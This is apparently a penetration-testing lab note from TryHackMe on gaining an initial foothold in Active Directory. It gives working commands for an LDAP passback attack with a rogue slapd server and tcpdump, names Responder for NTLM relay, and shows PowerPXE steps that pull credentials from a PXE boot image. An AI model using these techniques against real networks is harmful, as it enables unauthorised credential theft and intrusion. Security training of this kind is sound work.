# 1. Getting Foothold

## Brute Forcing NetNTLM

Internet facing applications may have their authentication tied back to an AD. If we manage to brute force these credentials, we may have access to the server

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2F7zLMvG2VUGe5ATXP9YQO%2Fimage.png?alt=media&#x26;token=cab53096-10c6-4f4e-b8ff-abe467f7bdb1" alt=""><figcaption></figcaption></figure>

## LDAP Passback attack

If we have access to a page with LDAP configurations and password censored out, we can setup our own LDAP server to intercept the traffic and obtain the password

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2Fw57C5sMNvRHG7IvlumMc%2Fimage.png?alt=media&#x26;token=b3bf3a60-e8ed-4ea8-8f86-0a63d80627fe" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```sh
$ sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

$ sudo dpkg-reconfigure -p low slapd
```

{% endcode %}

Create a `olcSaslSecProps.ldif` file

```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

Patch the existing LDAP file with the created file

{% code overflow="wrap" %}

```bash
$ sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```

{% endcode %}

Run TCPdump and click `Test Settings` to send the request

```bash
$ sudo tcpdump -SX -i <interface> tcp port 389
```

## SMB Auth Relay

Use `Responder`to intercept NTLM authentication traffic.

{% embed url="<https://github.com/lgandx/Responder>" %}

After we get the NTLM hash, we can either

1. Crack the hash
2. Relay the hash and MITM the process of getting a TGS. For this to happen, SMB signing needs be disabled, or enabled but not enforced.

## Microsoft Development Toolkit

Extracting credentials preloaded in the PXE boot image

Downloading the BCD file from the MDT site

{% code overflow="wrap" %}

```powershell
C:\Users\THM\Documents\Am0> tftp -i <THMMDT IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd
```

{% endcode %}

Getting the location of the `wim` file

{% code overflow="wrap" %}

```powershell
C:\Users\THM\Documents\Am0> powershell -executionpolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.   

PS C:\Users\THM\Documents\am0> Import-Module .\PowerPXE.ps1
PS C:\Users\THM\Documents\am0> $BCDFile = "conf.bcd"
PS C:\Users\THM\Documents\am0> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim
```

{% endcode %}

Download the WIM file and extract credentials

{% code overflow="wrap" %}

```powershell
PS C:\Users\THM\Documents\am0> tftp -i <THMMDT IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 218 second(s), 1568346 bytes/s
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
PS C:\Users\THM\Documents\am0> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>
```

{% endcode %}

## Configuration files

If we already have access to the host machine, search for artifacts that may contain credentials

* Configuration files
* Data stores
* Password stores

##